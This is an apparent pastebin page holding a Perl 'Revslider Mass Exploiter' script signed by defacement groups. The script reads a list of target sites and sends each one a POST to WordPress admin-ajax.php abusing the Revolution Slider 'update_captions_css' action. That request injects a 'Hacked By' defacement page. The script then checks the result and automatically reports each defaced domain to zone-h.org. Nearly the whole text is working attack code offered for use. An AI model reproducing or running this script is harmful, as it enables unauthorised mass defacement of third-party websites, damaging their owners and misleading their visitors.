SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/perl | |
2 | #Mass Revslider Coded By Cyberdark DZ | |
3 | #Recoded By ./MalingSendal - Trenggalek Cyber Army | |
4 | #Greetz : CowoKerensTeam - Sanjungan Jiwa - SpyHackerZ - Sector Security Tester | |
5 | ||
6 | use Term::ANSIColor; | |
7 | use LWP::UserAgent; | |
8 | use HTTP::Request; | |
9 | use HTTP::Request::Common qw(POST); | |
10 | $ua = LWP::UserAgent->new(keep_alive => 1); | |
11 | $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"); | |
12 | $ua->timeout (10); | |
13 | ||
14 | print " . . | |
15 | .n . . n. | |
16 | . .dP dP 9b 9b. . | |
17 | 4 qXb . dX Xb . dXp t | |
18 | dX. 9Xb .dXb __ __ dXb. dXP .Xb | |
19 | 9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP | |
20 | 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP | |
21 | `9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP' | |
22 | `9XXXXXXXXXXXP' `9XX' `98v8P' `XXP' `9XXXXXXXXXXXP' | |
23 | ~~~~~~~ 9X. .db|db. .XP ~~~~~~~ | |
24 | )b. .dbo.dP'`v'`9b.odb. .dX( | |
25 | ,dXXXXXXXXXXXb dXXXXXXXXXXXb. | |
26 | dXXXXXXXXXXXP' . `9XXXXXXXXXXXb | |
27 | dXXXXXXXXXXXXb d|b dXXXXXXXXXXXXb | |
28 | 9XXb' `XXXXXb.dX|Xb.dXXXXX' `dXXP | |
29 | `' 9XXXXXX( )XXXXXXP `' | |
30 | XXXX X.`v'.X XXXX | |
31 | XP^X'`b d'`X^XX | |
32 | X. 9 ` ' P )X | |
33 | `b ` ' d' | |
34 | ` ' | |
35 | -> Revslider Mass Exploiter <-\n"; | |
36 | print "List Target : "; | |
37 | my $list=<STDIN>; | |
38 | chomp($list); | |
39 | open (THETARGET, "<$list") || die " | |
40 | Directory not found."; | |
41 | @TARGETS = <THETARGET>; | |
42 | close THETARGET; | |
43 | $link=$#TARGETS + 1; | |
44 | ||
45 | foreach $site(@TARGETS){ | |
46 | ||
47 | chomp $site; | |
48 | if($site !~ /http:\/\//) { $site = "http://$site/"; }; | |
49 | ||
50 | $ajx = $site . 'wp-admin/admin-ajax.php'; | |
51 | ||
52 | $link = $site .'wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css'; | |
53 | ||
54 | print "Scan : $site\n"; | |
55 | ||
56 | $gassface = POST $ajx, [ | |
57 | 'action' => 'revslider_ajax_action', 'client_action' => 'update_captions_css', 'data' =>" | |
58 | <br><br><br><body style='color: transparent;background-color: white'><center><h1><b style='color: black'><center>Hacked By ./MalingSendal - Trenggalek Cyber Army<br>Greetz : CowoKerensTeam - Sanjungan Jiwa - SpyHackerZ - Sector Security Tester - And You<p style='color: transparent'>"]; | |
59 | $response = $ua->request($gassface); | |
60 | $stat = $response->content; | |
61 | if ($stat =~ /true/){ | |
62 | print colored ("Vulnerability ",'Green'),"\n"; | |
63 | print "--> $link\nPost Zone-H\n"; | |
64 | zonpost(); | |
65 | }else{ | |
66 | print colored ("Not Vulnerability ",'red'),"\n"; | |
67 | } | |
68 | } | |
69 | sub zonpost{ | |
70 | $req = HTTP::Request->new(GET=>$link); | |
71 | $useragent = LWP::UserAgent->new(); | |
72 | $response = $useragent->request($req); | |
73 | $ar = $response->content; | |
74 | if ($ar =~ /Hacked|Fallag |Gassrini/){ | |
75 | ||
76 | $dmn= $link; | |
77 | $def="Trenggalek Cyber Army"; | |
78 | $zn="http://zone-h.org/notify/single"; | |
79 | $lwp=LWP::UserAgent->new; | |
80 | $res=$lwp -> post($zn,[ | |
81 | 'defacer' => $def, | |
82 | 'domain1' => $dmn, | |
83 | 'hackmode' => '15', | |
84 | 'reason' => '1', | |
85 | 'submit' => 'Send', | |
86 | ]); | |
87 | if ($res->content =~ /color="red">(.*)<\/font><\/li>/) { | |
88 | print colored ("Submited $1",'white on_green'),"\n"; | |
89 | } | |
90 | else | |
91 | { | |
92 | print colored ("Error",'black on_white'),"\n"; | |
93 | } | |
94 | }else{ | |
95 | print" Not Defaced \n"; | |
96 | } | |
97 | } |